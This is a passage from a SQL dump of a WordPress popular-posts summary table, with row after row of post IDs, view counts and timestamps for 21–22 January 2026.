20:30:22'),(103288,5712,1,'2026-01-21','2026-01-21 20:30:29'),(103289,2904,1,'2026-01-21','2026-01-21 20:31:09'),(103290,5712,1,'2026-01-21','2026-01-21 20:31:12'),(103291,5712,1,'2026-01-21','2026-01-21 20:31:50'),(103292,2904,1,'2026-01-21','2026-01-21 20:31:51'),(103293,2904,1,'2026-01-21','2026-01-21 20:31:53'),(103294,5712,1,'2026-01-21','2026-01-21 20:32:06'),(103295,2904,1,'2026-01-21','2026-01-21 20:32:46'),(103296,5712,1,'2026-01-21','2026-01-21 20:33:44'),(103297,5712,1,'2026-01-21','2026-01-21 20:34:02'),(103298,3781,1,'2026-01-21','2026-01-21 20:39:45'),(103299,5712,1,'2026-01-21','2026-01-21 20:40:05'),(103300,5712,1,'2026-01-21','2026-01-21 20:40:39'),(103301,5712,1,'2026-01-21','2026-01-21 20:41:16'),(103302,5712,1,'2026-01-21','2026-01-21 20:41:28'),(103303,5428,1,'2026-01-21','2026-01-21 20:41:53'),(103304,5712,1,'2026-01-21','2026-01-21 20:47:23'),(103305,5712,1,'2026-01-21','2026-01-21 20:56:39'),(103306,5712,1,'2026-01-21','2026-01-21 20:57:22'),(103307,5712,1,'2026-01-21','2026-01-21 20:57:49'),(103308,5712,1,'2026-01-21','2026-01-21 21:02:19'),(103309,5712,1,'2026-01-21','2026-01-21 21:04:27'),(103310,5712,1,'2026-01-21','2026-01-21 21:05:30'),(103311,5712,1,'2026-01-21','2026-01-21 21:05:57'),(103312,5712,1,'2026-01-21','2026-01-21 21:06:53'),(103313,5712,1,'2026-01-21','2026-01-21 21:08:17'),(103314,2159,1,'2026-01-21','2026-01-21 21:09:05'),(103315,5712,1,'2026-01-21','2026-01-21 21:09:16'),(103316,5712,1,'2026-01-21','2026-01-21 21:12:19'),(103317,5712,1,'2026-01-21','2026-01-21 21:13:13'),(103318,5712,1,'2026-01-21','2026-01-21 21:13:29'),(103319,5712,1,'2026-01-21','2026-01-21 21:13:50'),(103320,5712,1,'2026-01-21','2026-01-21 21:14:22'),(103321,5712,1,'2026-01-21','2026-01-21 21:14:39'),(103322,5712,1,'2026-01-21','2026-01-21 21:17:00'),(103323,5712,1,'2026-01-21','2026-01-21 21:18:02'),(103324,5712,1,'2026-01-21','2026-01-21 21:21:04'),(103325,5712,1,'2026-01-21','2026-01-21 21:21:37'),(103326,5712,1,'2026-01-21','2026-01-21 21:21:47'),(103327,5712,1,'2026-01-21','2026-01-21 21:23:50'),(103328,5712,1,'2026-01-21','2026-01-21 21:24:11'),(103329,74,1,'2026-01-21','2026-01-21 21:25:16'),(103330,5712,1,'2026-01-21','2026-01-21 21:27:28'),(103331,74,1,'2026-01-21','2026-01-21 21:31:09'),(103332,5712,1,'2026-01-21','2026-01-21 21:31:20'),(103333,5712,1,'2026-01-21','2026-01-21 21:31:48'),(103334,5712,1,'2026-01-21','2026-01-21 21:32:18'),(103335,5712,1,'2026-01-21','2026-01-21 21:32:54'),(103336,5712,1,'2026-01-21','2026-01-21 21:34:31'),(103337,5712,1,'2026-01-21','2026-01-21 21:34:35'),(103338,5712,1,'2026-01-21','2026-01-21 21:36:14'),(103339,5712,1,'2026-01-21','2026-01-21 21:36:33'),(103340,5397,1,'2026-01-21','2026-01-21 21:37:02'),(103341,2904,1,'2026-01-21','2026-01-21 21:38:06'),(103342,5674,1,'2026-01-21','2026-01-21 21:38:36'),(103343,5712,1,'2026-01-21','2026-01-21 21:39:23'),(103344,5712,1,'2026-01-21','2026-01-21 21:41:07'),(103345,5712,1,'2026-01-21','2026-01-21 21:42:04'),(103346,5712,1,'2026-01-21','2026-01-21 21:42:14'),(103347,5712,1,'2026-01-21','2026-01-21 21:45:04'),(103348,5712,1,'2026-01-21','2026-01-21 21:45:51'),(103349,5712,1,'2026-01-21','2026-01-21 21:46:49'),(103350,5712,1,'2026-01-21','2026-01-21 21:47:05'),(103351,2904,1,'2026-01-21','2026-01-21 21:48:34'),(103352,5712,1,'2026-01-21','2026-01-21 21:48:35'),(103353,2904,1,'2026-01-21','2026-01-21 21:49:30'),(103354,5712,1,'2026-01-21','2026-01-21 21:49:50'),(103355,5712,1,'2026-01-21','2026-01-21 21:50:37'),(103356,5712,1,'2026-01-21','2026-01-21 21:51:03'),(103357,74,1,'2026-01-21','2026-01-21 21:51:38'),(103358,5712,1,'2026-01-21','2026-01-21 21:53:06'),(103359,74,1,'2026-01-21','2026-01-21 21:54:38'),(103360,2904,1,'2026-01-21','2026-01-21 21:55:05'),(103361,2904,1,'2026-01-21','2026-01-21 21:55:31'),(103362,5712,1,'2026-01-21','2026-01-21 21:57:42'),(103363,1722,1,'2026-01-21','2026-01-21 21:58:05'),(103364,2904,1,'2026-01-21','2026-01-21 21:58:06'),(103365,2904,1,'2026-01-21','2026-01-21 21:58:57'),(103366,2904,1,'2026-01-21','2026-01-21 21:59:06'),(103367,5712,1,'2026-01-21','2026-01-21 22:00:50'),(103368,5712,1,'2026-01-21','2026-01-21 22:01:16'),(103369,5712,1,'2026-01-21','2026-01-21 22:02:04'),(103370,1582,1,'2026-01-21','2026-01-21 22:02:04'),(103371,5712,1,'2026-01-21','2026-01-21 22:06:29'),(103372,5712,1,'2026-01-21','2026-01-21 22:06:48'),(103373,2904,1,'2026-01-21','2026-01-21 22:07:28'),(103374,5712,1,'2026-01-21','2026-01-21 22:07:46'),(103375,102,1,'2026-01-21','2026-01-21 22:08:20'),(103376,5712,1,'2026-01-21','2026-01-21 22:09:30'),(103377,102,1,'2026-01-21','2026-01-21 22:14:41'),(103378,5712,1,'2026-01-21','2026-01-21 22:14:42'),(103379,5712,1,'2026-01-21','2026-01-21 22:21:36'),(103380,5712,1,'2026-01-21','2026-01-21 22:29:39'),(103381,5712,1,'2026-01-21','2026-01-21 22:34:52'),(103382,5712,1,'2026-01-21','2026-01-21 22:35:09'),(103383,5515,1,'2026-01-21','2026-01-21 22:35:23'),(103384,5712,1,'2026-01-21','2026-01-21 22:36:34'),(103385,5712,1,'2026-01-21','2026-01-21 22:36:45'),(103386,5712,1,'2026-01-21','2026-01-21 22:38:59'),(103387,5712,1,'2026-01-21','2026-01-21 22:42:04'),(103388,5708,1,'2026-01-21','2026-01-21 22:45:08'),(103389,483,1,'2026-01-21','2026-01-21 22:47:02'),(103390,5712,1,'2026-01-21','2026-01-21 22:47:55'),(103391,5712,1,'2026-01-21','2026-01-21 22:48:39'),(103392,5712,1,'2026-01-21','2026-01-21 22:49:17'),(103393,483,1,'2026-01-21','2026-01-21 22:52:52'),(103394,5128,1,'2026-01-21','2026-01-21 22:59:29'),(103395,5712,1,'2026-01-21','2026-01-21 23:01:18'),(103396,5712,1,'2026-01-21','2026-01-21 23:01:20'),(103397,5712,1,'2026-01-21','2026-01-21 23:01:51'),(103398,2297,1,'2026-01-21','2026-01-21 23:02:33'),(103399,5712,1,'2026-01-21','2026-01-21 23:03:12'),(103400,5712,1,'2026-01-21','2026-01-21 23:03:58'),(103401,483,1,'2026-01-21','2026-01-21 23:04:19'),(103402,5712,1,'2026-01-21','2026-01-21 23:05:59'),(103403,5080,1,'2026-01-21','2026-01-21 23:12:06'),(103404,5712,1,'2026-01-21','2026-01-21 23:12:39'),(103405,5712,1,'2026-01-21','2026-01-21 23:14:32');
INSERT INTO `wp_popularpostssummary` VALUES (103406,5712,1,'2026-01-21','2026-01-21 23:17:41'),(103407,5712,1,'2026-01-21','2026-01-21 23:18:05'),(103408,5712,1,'2026-01-21','2026-01-21 23:18:48'),(103409,80,1,'2026-01-21','2026-01-21 23:20:13'),(103410,5433,1,'2026-01-21','2026-01-21 23:20:23'),(103411,5712,1,'2026-01-21','2026-01-21 23:22:21'),(103412,80,1,'2026-01-21','2026-01-21 23:22:41'),(103413,5712,1,'2026-01-21','2026-01-21 23:23:10'),(103414,80,1,'2026-01-21','2026-01-21 23:23:43'),(103415,5712,1,'2026-01-21','2026-01-21 23:23:47'),(103416,483,1,'2026-01-21','2026-01-21 23:24:26'),(103417,5712,1,'2026-01-21','2026-01-21 23:28:27'),(103418,2904,1,'2026-01-21','2026-01-21 23:29:10'),(103419,102,1,'2026-01-21','2026-01-21 23:29:48'),(103420,5712,1,'2026-01-21','2026-01-21 23:44:31'),(103421,5712,1,'2026-01-21','2026-01-21 23:45:42'),(103422,5712,1,'2026-01-21','2026-01-21 23:45:55'),(103423,5712,1,'2026-01-21','2026-01-21 23:46:08'),(103424,5712,1,'2026-01-21','2026-01-21 23:52:00'),(103425,80,1,'2026-01-21','2026-01-21 23:52:27'),(103426,5712,1,'2026-01-21','2026-01-21 23:55:10'),(103427,5292,1,'2026-01-21','2026-01-21 23:55:56'),(103428,5712,1,'2026-01-21','2026-01-21 23:58:37'),(103429,5712,1,'2026-01-22','2026-01-22 00:05:04'),(103430,5712,1,'2026-01-22','2026-01-22 00:06:29'),(103431,3278,1,'2026-01-22','2026-01-22 00:10:48'),(103432,5712,1,'2026-01-22','2026-01-22 00:11:06'),(103433,4858,1,'2026-01-22','2026-01-22 00:11:51'),(103434,5712,1,'2026-01-22','2026-01-22 00:22:09'),(103435,5712,1,'2026-01-22','2026-01-22 00:29:02'),(103436,5712,1,'2026-01-22','2026-01-22 00:34:06'),(103437,5712,1,'2026-01-22','2026-01-22 00:38:36'),(103438,2904,1,'2026-01-22','2026-01-22 00:38:50'),(103439,5712,1,'2026-01-22','2026-01-22 01:03:44'),(103440,5712,1,'2026-01-22','2026-01-22 01:05:46'),(103441,2904,1,'2026-01-22','2026-01-22 01:06:28'),(103442,5712,1,'2026-01-22','2026-01-22 01:09:55'),(103443,2904,1,'2026-01-22','2026-01-22 01:10:45'),(103444,5712,1,'2026-01-22','2026-01-22 01:10:59'),(103445,2904,1,'2026-01-22','2026-01-22 01:11:34'),(103446,5712,1,'2026-01-22','2026-01-22 01:19:04'),(103447,2904,1,'2026-01-22','2026-01-22 01:21:08'),(103448,87,1,'2026-01-22','2026-01-22 01:22:19'),(103449,481,1,'2026-01-22','2026-01-22 01:23:39'),(103450,482,1,'2026-01-22','2026-01-22 01:23:59'),(103451,483,1,'2026-01-22','2026-01-22 01:24:15'),(103452,482,1,'2026-01-22','2026-01-22 01:24:23'),(103453,481,1,'2026-01-22','2026-01-22 01:24:33'),(103454,482,1,'2026-01-22','2026-01-22 01:25:04'),(103455,483,1,'2026-01-22','2026-01-22 01:25:06'),(103456,482,1,'2026-01-22','2026-01-22 01:25:09'),(103457,481,1,'2026-01-22','2026-01-22 01:25:11'),(103458,87,1,'2026-01-22','2026-01-22 01:25:13'),(103459,2904,1,'2026-01-22','2026-01-22 01:25:16'),(103460,2904,1,'2026-01-22','2026-01-22 01:25:51'),(103461,5712,1,'2026-01-22','2026-01-22 01:25:56'),(103462,5639,1,'2026-01-22','2026-01-22 01:36:23'),(103463,3781,1,'2026-01-22','2026-01-22 01:38:32'),(103464,5712,1,'2026-01-22','2026-01-22 02:19:05'),(103465,5712,1,'2026-01-22','2026-01-22 02:19:39'),(103466,5712,1,'2026-01-22','2026-01-22 02:20:19'),(103467,5712,1,'2026-01-22','2026-01-22 02:20:42'),(103468,5712,1,'2026-01-22','2026-01-22 02:25:43'),(103469,76,1,'2026-01-22','2026-01-22 02:30:16'),(103470,4980,1,'2026-01-22','2026-01-22 02:48:44'),(103471,5712,1,'2026-01-22','2026-01-22 03:08:57'),(103472,68,1,'2026-01-22','2026-01-22 03:09:00'),(103473,335,1,'2026-01-22','2026-01-22 03:09:04'),(103474,80,1,'2026-01-22','2026-01-22 03:09:06'),(103475,5712,1,'2026-01-22','2026-01-22 03:23:07'),(103476,5598,1,'2026-01-22','2026-01-22 03:25:54'),(103477,3051,1,'2026-01-22','2026-01-22 03:39:23'),(103478,5712,1,'2026-01-22','2026-01-22 03:43:08'),(103479,5712,1,'2026-01-22','2026-01-22 04:09:15'),(103480,5712,1,'2026-01-22','2026-01-22 04:23:53'),(103481,5712,1,'2026-01-22','2026-01-22 04:34:10'),(103482,5712,1,'2026-01-22','2026-01-22 05:04:45'),(103483,5712,1,'2026-01-22','2026-01-22 05:13:33'),(103484,5712,1,'2026-01-22','2026-01-22 05:19:37'),(103485,5712,1,'2026-01-22','2026-01-22 05:33:34'),(103486,5712,1,'2026-01-22','2026-01-22 05:34:03'),(103487,5712,1,'2026-01-22','2026-01-22 05:50:39'),(103488,5712,1,'2026-01-22','2026-01-22 05:51:39'),(103489,5109,1,'2026-01-22','2026-01-22 06:06:59'),(103490,5712,1,'2026-01-22','2026-01-22 06:10:43'),(103491,5425,1,'2026-01-22','2026-01-22 06:30:15'),(103492,5712,1,'2026-01-22','2026-01-22 06:30:38'),(103493,5712,1,'2026-01-22','2026-01-22 06:31:28'),(103494,5712,1,'2026-01-22','2026-01-22 06:34:29'),(103495,5712,1,'2026-01-22','2026-01-22 06:34:37'),(103496,5712,1,'2026-01-22','2026-01-22 06:36:15'),(103497,5502,1,'2026-01-22','2026-01-22 06:39:54'),(103498,5712,1,'2026-01-22','2026-01-22 06:48:08'),(103499,5712,1,'2026-01-22','2026-01-22 07:00:56'),(103500,5712,1,'2026-01-22','2026-01-22 07:01:09'),(103501,5712,1,'2026-01-22','2026-01-22 07:01:54'),(103502,5708,1,'2026-01-22','2026-01-22 07:07:47'),(103503,5712,1,'2026-01-22','2026-01-22 07:09:52'),(103504,5712,1,'2026-01-22','2026-01-22 07:11:20'),(103505,5712,1,'2026-01-22','2026-01-22 07:15:48'),(103506,5712,1,'2026-01-22','2026-01-22 07:19:18'),(103507,5712,1,'2026-01-22','2026-01-22 07:19:57'),(103508,5712,1,'2026-01-22','2026-01-22 07:20:38'),(103509,5712,1,'2026-01-22','2026-01-22 07:22:37'),(103510,5712,1,'2026-01-22','2026-01-22 07:33:10'),(103511,5712,1,'2026-01-22','2026-01-22 07:33:57'),(103512,5712,1,'2026-01-22','2026-01-22 07:39:17'),(103513,5712,1,'2026-01-22','2026-01-22 07:40:07'),(103514,5712,1,'2026-01-22','2026-01-22 07:48:46'),(103515,5712,1,'2026-01-22','2026-01-22 07:51:30'),(103516,5712,1,'2026-01-22','2026-01-22 07:52:51'),(103517,5712,1,'2026-01-22','2026-01-22 07:55:43'),(103518,4963,1,'2026-01-22','2026-01-22 07:57:29'),(103519,2956,1,'2026-01-22','2026-01-22 07:57:30'),(103520,2152,1,'2026-01-22','2026-01-22 07:57:36'),(103521,468,1,'2026-01-22','2026-01-22 07:57:43'),(103522,5712,1,'2026-01-22','2026-01-22 07:58:21'),(103523,1614,1,'2026-01-22','2026-01-22 07:58:24'),(103524,5712,1,'2026-01-22','2026-01-22 07:59:35'),(103525,2419,1,'2026-01-22','2026-01-22 07:59:51'),(103526,2751,1,'2026-01-22','2026-01-22 08:00:18'),(103527,5712,1,'2026-01-22','2026-01-22 08:00:55'),(103528,2813,1,'2026-01-22','2026-01-22 08:01:06'),(103529,5712,1,'2026-01-22','2026-01-22 08:04:12'),(103530,5298,1,'2026-01-22','2026-01-22 08:20:06'),(103531,5712,1,'2026-01-22','2026-01-22 08:23:27'),(103532,5712,1,'2026-01-22','2026-01-22 08:31:49'),(103533,5712,1,'2026-01-22','2026-01-22 08:32:52'),(103534,5054,1,'2026-01-22','2026-01-22 08:33:35'),(103535,3087,1,'2026-01-22','2026-01-22 08:34:43'),(103536,5712,1,'2026-01-22','2026-01-22 08:36:55'),(103537,5712,1,'2026-01-22','2026-01-22 08:39:48'),(103538,5712,1,'2026-01-22','2026-01-22 08:44:32'),(103539,5712,1,'2026-01-22','2026-01-22 08:47:09'),(103540,5712,1,'2026-01-22','2026-01-22 08:47:49'),(103541,2904,1,'2026-01-22','2026-01-22 08:48:11'),(103542,2904,1,'2026-01-22','2026-01-22 08:49:10'),(103543,5712,1,'2026-01-22','2026-01-22 08:51:42'),(103544,5712,1,'2026-01-22','2026-01-22 08:53:43'),(103545,5712,1,'2026-01-22','2026-01-22 08:53:52'),(103546,5712,1,'2026-01-22','2026-01-22 08:56:00'),(103547,2904,1,'2026-01-22','2026-01-22 08:57:49'),(103548,5712,1,'2026-01-22','2026-01-22 08:58:03'),(103549,5712,1,'2026-01-22','2026-01-22 08:58:36'),(103550,5708,1,'2026-01-22','2026-01-22 09:01:24'),(103551,5708,1,'2026-01-22','2026-01-22 09:02:06'),(103552,5712,1,'2026-01-22','2026-01-22 09:07:55'),(103553,2904,1,'2026-01-22','2026-01-22 09:08:30'),(103554,5712,1,'2026-01-22','2026-01-22 09:08:42'),(103555,5518,1,'2026-01-22','2026-01-22 09:08:44'),(103556,5712,1,'2026-01-22','2026-01-22 09:09:30'),(103557,2904,1,'2026-01-22','2026-01-22 09:09:56'),(103558,91,1,'2026-01-22','2026-01-22 09:10:41'),(103559,5712,1,'2026-01-22','2026-01-22 09:12:25'),(103560,5712,1,'2026-01-22','2026-01-22 09:13:54'),(103561,5712,1,'2026-01-22','2026-01-22 09:17:31'),(103562,5712,1,'2026-01-22','2026-01-22 09:20:02'),(103563,5712,1,'2026-01-22','2026-01-22 09:20:57'),(103564,5712,1,'2026-01-22','2026-01-22 09:21:26'),(103565,5712,1,'2026-01-22','2026-01-22 09:21:47'),(103566,5712,1,'2026-01-22','2026-01-22 09:34:04'),(103567,5712,1,'2026-01-22','2026-01-22 09:34:49'),(103568,5712,1,'2026-01-22','2026-01-22 09:35:10'),(103569,5712,1,'2026-01-22','2026-01-22 09:37:32'),(103570,5712,1,'2026-01-22','2026-01-22 09:38:05'),(103571,5712,1,'2026-01-22','2026-01-22 09:39:02'),(103572,5712,1,'2026-01-22','2026-01-22 09:40:45'),(103573,5712,1,'2026-01-22','2026-01-22 09:42:33'),(103574,5712,1,'2026-01-22','2026-01-22 09:45:54'),(103575,74,1,'2026-01-22','2026-01-22 09:46:45'),(103576,74,1,'2026-01-22','2026-01-22 09:47:31'),(103577,74,1,'2026-01-22','2026-01-22 09:49:57'),(103578,5712,1,'2026-01-22','2026-01-22 09:50:08'),(103579,5712,1,'2026-01-22','2026-01-22 09:51:46'),(103580,5712,1,'2026-01-22','2026-01-22 09:52:26'),(103581,74,1,'2026-01-22','2026-01-22 09:53:22'),(103582,80,1,'2026-01-22','2026-01-22 09:53:48'),(103583,5712,1,'2026-01-22','2026-01-22 09:53:51'),(103584,5712,1,'2026-01-22','2026-01-22 09:56:04'),(103585,5712,1,'2026-01-22','2026-01-22 09:56:40'),(103586,5712,1,'2026-01-22','2026-01-22 09:57:11'),(103587,5712,1,'2026-01-22','2026-01-22 10:04:41'),(103588,5712,1,'2026-01-22','2026-01-22 10:07:16'),(103589,5712,1,'2026-01-22','2026-01-22 10:08:54'),(103590,5703,1,'2026-01-22','2026-01-22 10:13:36'),(103591,5712,1,'2026-01-22','2026-01-22 10:33:44'),(103592,5712,1,'2026-01-22','2026-01-22 10:36:54'),(103593,4950,1,'2026-01-22','2026-01-22 10:41:58'),(103594,5712,1,'2026-01-22','2026-01-22 10:49:00'),(103595,2152,1,'2026-01-22','2026-01-22 10:56:20'),(103596,5712,1,'2026-01-22','2026-01-22 10:57:19'),(103597,4963,1,'2026-01-22','2026-01-22 10:57:34'),(103598,2419,1,'2026-01-22','2026-01-22 10:58:20'),(103599,5712,1,'2026-01-22','2026-01-22 10:58:44'),(103600,5712,1,'2026-01-22','2026-01-22 10:58:53'),(103601,2813,1,'2026-01-22','2026-01-22 10:59:35'),(103602,5712,1,'2026-01-22','2026-01-22 11:01:01'),(103603,5712,1,'2026-01-22','2026-01-22 11:01:51'),(103604,5712,1,'2026-01-22','2026-01-22 11:03:47'),(103605,5712,1,'2026-01-22','2026-01-22 11:03:50'),(103606,5712,1,'2026-01-22','2026-01-22 11:03:58'),(103607,5712,1,'2026-01-22','2026-01-22 11:06:45'),(103608,5712,1,'2026-01-22','2026-01-22 11:08:22'),(103609,5712,1,'2026-01-22','2026-01-22 11:15:20'),(103610,5712,1,'2026-01-22','2026-01-22 11:16:19'),(103611,5712,1,'2026-01-22','2026-01-22 11:24:19'),(103612,4950,1,'2026-01-22','2026-01-22 11:26:43'),(103613,80,1,'2026-01-22','2026-01-22 11:27:06'),(103614,4950,1,'2026-01-22','2026-01-22 11:28:38'),(103615,5712,1,'2026-01-22','2026-01-22 11:32:17'),(103616,5712,1,'2026-01-22','2026-01-22 11:32:17'),(103617,5712,1,'2026-01-22','2026-01-22 11:37:20'),(103618,5712,1,'2026-01-22','2026-01-22 11:39:01'),(103619,3479,1,'2026-01-22','2026-01-22 11:39:10'),(103620,5712,1,'2026-01-22','2026-01-22 11:42:24'),(103621,5712,1,'2026-01-22','2026-01-22 11:42:56'),(103622,2904,1,'2026-01-22','2026-01-22 11:43:00'),(103623,2904,1,'2026-01-22','2026-01-22 11:43:58'),(103624,5643,1,'2026-01-22','2026-01-22 11:44:19'),(103625,2904,1,'2026-01-22','2026-01-22 11:45:29'),(103626,2904,1,'2026-01-22','2026-01-22 11:45:32'),(103627,5712,1,'2026-01-22','2026-01-22 11:45:36'),(103628,5712,1,'2026-01-22','2026-01-22 11:46:30'),(103629,5712,1,'2026-01-22','2026-01-22 11:48:18'),(103630,4674,1,'2026-01-22','2026-01-22 11:53:18'),(103631,5712,1,'2026-01-22','2026-01-22 11:53:54'),(103632,5712,1,'2026-01-22','2026-01-22 11:54:06'),(103633,5712,1,'2026-01-22','2026-01-22 11:57:03'),(103634,5712,1,'2026-01-22','2026-01-22 11:57:20'),(103635,5712,1,'2026-01-22','2026-01-22 11:58:15'),(103636,5712,1,'2026-01-22','2026-01-22 11:58:35'),(103637,5712,1,'2026-01-22','2026-01-22 11:59:37'),(103638,5712,1,'2026-01-22','2026-01-22 12:01:49'),(103639,5712,1,'2026-01-22','2026-01-22 12:04:49'),(103640,4674,1,'2026-01-22','2026-01-22 12:05:20'),(103641,5712,1,'2026-01-22','2026-01-22 12:12:33'),(103642,5712,1,'2026-01-22','2026-01-22 12:12:37'),(103643,5712,1,'2026-01-22','2026-01-22 12:14:10'),(103644,5712,1,'2026-01-22','2026-01-22 12:16:50'),(103645,4436,1,'2026-01-22','2026-01-22 12:16:52'),(103646,5712,1,'2026-01-22','2026-01-22 12:19:13'),(103647,5712,1,'2026-01-22','2026-01-22 12:20:36'),(103648,5712,1,'2026-01-22','2026-01-22 12:21:23'),(103649,5712,1,'2026-01-22','2026-01-22 12:22:38'),(103650,5712,1,'2026-01-22','2026-01-22 12:24:03'),(103651,5712,1,'2026-01-22','2026-01-22 12:27:45'),(103652,5712,1,'2026-01-22','2026-01-22 12:30:30'),(103653,5712,1,'2026-01-22','2026-01-22 12:32:11'),(103654,5146,1,'2026-01-22','2026-01-22 12:33:38'),(103655,5712,1,'2026-01-22','2026-01-22 12:33:56'),(103656,2419,1,'2026-01-22','2026-01-22 12:36:01'),(103657,4963,1,'2026-01-22','2026-01-22 12:36:49'),(103658,468,1,'2026-01-22','2026-01-22 12:36:52'),(103659,2751,1,'2026-01-22','2026-01-22 12:38:26'),(103660,2813,1,'2026-01-22','2026-01-22 12:38:52'),(103661,2152,1,'2026-01-22','2026-01-22 12:39:15'),(103662,2956,1,'2026-01-22','2026-01-22 12:39:36'),(103663,5712,1,'2026-01-22','2026-01-22 12:40:38'),(103664,5712,1,'2026-01-22','2026-01-22 12:41:41'),(103665,4719,1,'2026-01-22','2026-01-22 12:43:41'),(103666,5712,1,'2026-01-22','2026-01-22 12:44:48'),(103667,5712,1,'2026-01-22','2026-01-22 12:48:01'),(103668,5712,1,'2026-01-22','2026-01-22 12:56:24'),(103669,5712,1,'2026-01-22','2026-01-22 13:00:56'),(103670,5593,1,'2026-01-22','2026-01-22 13:01:56'),(103671,5712,1,'2026-01-22','2026-01-22 13:04:36'),(103672,5712,1,'2026-01-22','2026-01-22 13:06:54'),(103673,5712,1,'2026-01-22','2026-01-22 13:10:20'),(103674,4950,1,'2026-01-22','2026-01-22 13:15:02'),(103675,5712,1,'2026-01-22','2026-01-22 13:15:04'),(103676,68,1,'2026-01-22','2026-01-22 13:15:26'),(103677,5712,1,'2026-01-22','2026-01-22 13:18:21'),(103678,5712,1,'2026-01-22','2026-01-22 13:20:27'),(103679,5712,1,'2026-01-22','2026-01-22 13:20:54'),(103680,5712,1,'2026-01-22','2026-01-22 13:23:57'),(103681,5712,1,'2026-01-22','2026-01-22 13:31:27'),(103682,5712,1,'2026-01-22','2026-01-22 13:31:30'),(103683,5712,1,'2026-01-22','2026-01-22 13:32:22'),(103684,5712,1,'2026-01-22','2026-01-22 13:32:48'),(103685,5712,1,'2026-01-22','2026-01-22 13:33:34'),(103686,5454,1,'2026-01-22','2026-01-22 13:33:57'),(103687,5712,1,'2026-01-22','2026-01-22 13:35:32'),(103688,5712,1,'2026-01-22','2026-01-22 13:35:45'),(103689,5712,1,'2026-01-22','2026-01-22 13:36:23'),(103690,5712,1,'2026-01-22','2026-01-22 13:36:48'),(103691,5712,1,'2026-01-22','2026-01-22 13:38:46'),(103692,5712,1,'2026-01-22','2026-01-22 13:39:38'),(103693,5712,1,'2026-01-22','2026-01-22 13:41:12'),(103694,5712,1,'2026-01-22','2026-01-22 13:44:18'),(103695,5712,1,'2026-01-22','2026-01-22 13:44:32'),(103696,5712,1,'2026-01-22','2026-01-22 13:49:39'),(103697,1695,1,'2026-01-22','2026-01-22 13:53:42'),(103698,4960,1,'2026-01-22','2026-01-22 13:54:48'),(103699,5712,1,'2026-01-22','2026-01-22 13:56:24'),(103700,5712,1,'2026-01-22','2026-01-22 13:58:38'),(103701,5712,1,'2026-01-22','2026-01-22 14:03:25'),(103702,5712,1,'2026-01-22','2026-01-22 14:03:27'),(103703,4335,1,'2026-01-22','2026-01-22 14:05:33'),(103704,5712,1,'2026-01-22','2026-01-22 14:05:50'),(103705,5712,1,'2026-01-22','2026-01-22 14:07:49'),(103706,5712,1,'2026-01-22','2026-01-22 14:14:13'),(103707,5712,1,'2026-01-22','2026-01-22 14:14:16'),(103708,5712,1,'2026-01-22','2026-01-22 14:15:40'),(103709,5400,1,'2026-01-22','2026-01-22 14:18:07'),(103710,89,1,'2026-01-22','2026-01-22 14:20:39'),(103711,5712,1,'2026-01-22','2026-01-22 14:24:23'),(103712,5712,1,'2026-01-22','2026-01-22 14:27:38'),(103713,5712,1,'2026-01-22','2026-01-22 14:28:24'),(103714,5712,1,'2026-01-22','2026-01-22 14:30:34'),(103715,5712,1,'2026-01-22','2026-01-22 14:32:26'),(103716,5712,1,'2026-01-22','2026-01-22 14:35:32'),(103717,5712,1,'2026-01-22','2026-01-22 14:39:43'),(103718,5712,1,'2026-01-22','2026-01-22 14:40:24'),(103719,4529,1,'2026-01-22','2026-01-22 14:41:21'),(103720,2152,1,'2026-01-22','2026-01-22 14:42:16'),(103721,5712,1,'2026-01-22','2026-01-22 14:42:37'),(103722,468,1,'2026-01-22','2026-01-22 14:43:06'),(103723,5512,1,'2026-01-22','2026-01-22 14:43:27'),(103724,5712,1,'2026-01-22','2026-01-22 14:49:01'),(103725,5712,1,'2026-01-22','2026-01-22 14:52:03'),(103726,5712,1,'2026-01-22','2026-01-22 14:54:09'),(103727,5712,1,'2026-01-22','2026-01-22 14:54:49'),(103728,5712,1,'2026-01-22','2026-01-22 14:56:14'),(103729,5712,1,'2026-01-22','2026-01-22 14:57:27'),(103730,5712,1,'2026-01-22','2026-01-22 15:02:05'),(103731,5712,1,'2026-01-22','2026-01-22 15:08:28'),(103732,5712,1,'2026-01-22','2026-01-22 15:08:33'),(103733,3774,1,'2026-01-22','2026-01-22 15:11:57'),(103734,5712,1,'2026-01-22','2026-01-22 15:12:49'),(103735,5666,1,'2026-01-22','2026-01-22 15:13:14'),(103736,5712,1,'2026-01-22','2026-01-22 15:15:36'),(103737,5712,1,'2026-01-22','2026-01-22 15:18:27'),(103738,5666,1,'2026-01-22','2026-01-22 15:18:47'),(103739,5712,1,'2026-01-22','2026-01-22 15:18:57'),(103740,5712,1,'2026-01-22','2026-01-22 15:19:58'),(103741,5712,1,'2026-01-22','2026-01-22 15:20:55'),(103742,5712,1,'2026-01-22','2026-01-22 15:22:22'),(103743,5712,1,'2026-01-22','2026-01-22 15:24:20'),(103744,5712,1,'2026-01-22','2026-01-22 15:24:28'),(103745,5712,1,'2026-01-22','2026-01-22 15:24:52'),(103746,2411,1,'2026-01-22','2026-01-22 15:25:33'),(103747,5712,1,'2026-01-22','2026-01-22 15:26:22'),(103748,4832,1,'2026-01-22','2026-01-22 15:26:53'),(103749,5712,1,'2026-01-22','2026-01-22 15:28:23'),(103750,5712,1,'2026-01-22','2026-01-22 15:30:00'),(103751,5712,1,'2026-01-22','2026-01-22 15:30:43'),(103752,5712,1,'2026-01-22','2026-01-22 15:34:32'),(103753,5712,1,'2026-01-22','2026-01-22 15:41:45'),(103754,5712,1,'2026-01-22','2026-01-22 15:42:21'),(103755,5712,1,'2026-01-22','2026-01-22 15:42:27'),(103756,5712,1,'2026-01-22','2026-01-22 15:43:26'),(103757,5712,1,'2026-01-22','2026-01-22 15:43:47'),(103758,2904,1,'2026-01-22','2026-01-22 15:44:00'),(103759,74,1,'2026-01-22','2026-01-22 15:45:03'),(103760,2904,1,'2026-01-22','2026-01-22 15:45:17'),(103761,5712,1,'2026-01-22','2026-01-22 15:45:45'),(103762,1582,1,'2026-01-22','2026-01-22 15:46:48'),(103763,5712,1,'2026-01-22','2026-01-22 15:47:57'),(103764,5712,1,'2026-01-22','2026-01-22 15:47:57'),(103765,5712,1,'2026-01-22','2026-01-22 15:48:18'),(103766,5712,1,'2026-01-22','2026-01-22 15:49:51'),(103767,5712,1,'2026-01-22','2026-01-22 15:57:00'),(103768,5712,1,'2026-01-22','2026-01-22 15:57:55'),(103769,5712,1,'2026-01-22','2026-01-22 16:02:48'),(103770,5712,1,'2026-01-22','2026-01-22 16:03:26'),(103771,5712,1,'2026-01-22','2026-01-22 